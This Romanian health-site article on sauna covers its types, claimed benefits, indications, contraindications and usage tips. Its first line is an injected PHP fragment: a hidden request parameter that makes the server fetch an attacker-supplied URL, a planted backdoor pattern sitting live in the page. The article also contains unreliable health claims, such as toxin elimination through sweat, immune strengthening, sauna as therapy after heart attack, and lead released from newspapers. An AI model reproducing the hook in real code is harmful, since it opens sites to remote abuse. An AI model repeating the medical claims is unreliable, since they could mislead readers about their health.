isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Sauna - MedicAS

cabina sauna

Sauna este o modalitate de relaxare şi terapie practicată din cele mai vechi timpuri de foarte multe popoare: nativii americani se relaxau prin ceea ce se numeşte astăzi ‘sweat lodge’, turcii au ‘hammam’-ul, romanii aveau ‘thermae’-le, aztecii şi mayaşii – ‘temescalli’, evreii practică ‘Shvitz’-ul, iar japonezii – ‘Mushi-Buro’. Cu toate acestea, finlandezii sunt cei care au “brevetat” băile de aburi şi le-au popularizat în societatea contemporană.

Sauna uscată sau umedă?

Din toate aceste tradiţii s-au “cristalizat” două tipuri principale de saună de care ne putem bucura oricând: sauna uscată şi cea umedă. Sauna uscată este cel mai vechi tip de saună şi derivă din obiceiurile scandinave. Într-o cameră închisă se face foc sub o grămadă de pietre speciale, într-un cuptor închis, fără horn. După ce se încing pietrele, se curăţă jarul şi camera este gata: cu o temperatură cuprinsă între 80 si 120 grade şi o umiditate relativă între 5 şi 15%, sauna uscată conferă o experienţă relaxantă pentru practicanţi, în special dacă pe pietrele încinse s-au picurat uleiuri esenţiale cu proprietăţi calmante. În mod normal, aceste temperaturi ar fi insuportabile pentru noi, însă, prin controlul umidităţii, sauna uscată nu prezintă niciun pericol pentru oamenii sănătoşi.

Sauna umedă derivă din hammam: temperaturile nu depăşesc 60 de grade (de obicei, temperatura într-o saună umedă este în jur de 40 de grade), însă umiditatea se apropie de 100%. Dacă temperatura este prea ridicată, în condiţiile unei umidităţi atât de mari ar exista riscul opăririi pielii. În sauna umedă se toarnă periodic apă peste pietrele încinse pentru obţinerea aburului. De asemenea, adăguarea uleiurilor esenţiale în apă poate contribui la transformarea saunei într-o experienţă deosebit de relaxantă.

Pentru o saună completă, sesiunile de stat efectiv la căldură nu trebuie să depăşească 15 minute. Apoi, pentru un efect maxim, se recomandă o baie de apă călduţă în care organismul e introdus treptat. La final, repausul la o temperatuă normală completează experienţa unei saune adevărate. Cei care practică sauna de mult timp recurg des la repetarea fazei de căldură.

Sauna şi efectele ei:

  • În faza de căldură, transpiraţia ajută la eliminarea toxinelor din organism, muşchii se relaxează iar presiunea arterială se normalizează. Activitatea glandelor sudoripare sporeşte dezvoltarea colagenului, ceea ce conferă pielii o elasticitate mai mare şi un aspect lipsit de riduri. În timpul unei şedinţe de saună, ritmul cardiac creşte cu un procent similar celui din timpul alergării: 50-75%. Acest lucru se datorează dilatării vaselor de sânge. Inima trebuie să bată mai puternic pentru a propulsa sângele cu aceeaşi viteză, ceea ce accelerează metabolismul la fel ca şi exerciţiile fizice. Inhalarea de aburi uşurează secreţiile şi stimulează eliminarea de mucus din plămâni şi gât. În combinaţile cu uleiul de eucalypt, aburul ajută la eliberarea căilor respiratorii.
  • Faza de răcire normalizează temperatura corpului, care creşte la peste 38 de grade în timpul saunei. Aerul rece stimulează lucrul vaselor sangvine periferice şi trezeşte din starea de somnolenţă indusă de căldură. Contrastul cald-rece accelerează metabolismul şi are un efect general de “călire” a organismului, prin fortifierea sistemului imunitar.

Sauna - indicaţii:

  • Sauna este foarte indicată ca terapie în formele uşoare de , astm bronşic, bronşită, dureri musculare şi de ligamente, reumatism, la pacienţii postinfarct; efectul tonifiant este de un real ajutor în tratamentul insomniilor, stressului, depresiei.

Sauna - contraindicaţii:

  • Contraindicaţiile saunei cuprind bolile inflamatorii acute interne, infecţiile febrile, infarctul acut, tulburările circulaţiei cerebrale, epilepsia, glaucomul, bolile sexuale, tumorile.

Cum procedăm?

“Echipamentul” unei şedinţe de saună include un prosop de mărime medie pentru a evita contactul direct al pielii cu banca de lemn (pentru a evita transmiterea de ciuperci şi bacterii) şi unul mic pentru învelirea părului (sauna usucă părul). Dacă doriţi să purtaţi un costum de baie, aveţi grijă să nu fie sintetic, deoarece materialele sintetice se încing foarte repede. Mai aveţi nevoie şi de o sticlă cu apă (cu cât veţi bea mai multă apă, cu atât veţi transpira mai mult), care, preferabil, să nu fie de plastic.
Este foarte recomandat să vă demachiaţi înainte să intraţi în saună. Dacă neglijaţi acest aspect, vă puteţi infecta: la căldură, porii se dilată, facilitând pătrunderea particulelor de machiaj. De asemena, nu luaţi cu dumneavoastră ziare sau reviste: plumbul folosit la tipar este toxic şi se degajă la căldură.

Dacă nu aţi fost la saună până acum, acesta este un bun prilej de a lua în considerare beneficiile sale. Totuşi, aveţi grijă să nu exageraţi! Două şedinţe de saună pe săptămână este numărul ideal. Practicată în exces, sauna usucă pielea şi părul. Practicată cu moderaţie, face minuni pentru trup şi suflet. Efectele le veţi resimţi imediat!


Cuvinte relevante: , , ,


Articole asemănătoare:


Adaugă un comentariu






 
 

Newsletter

Loading... Loading...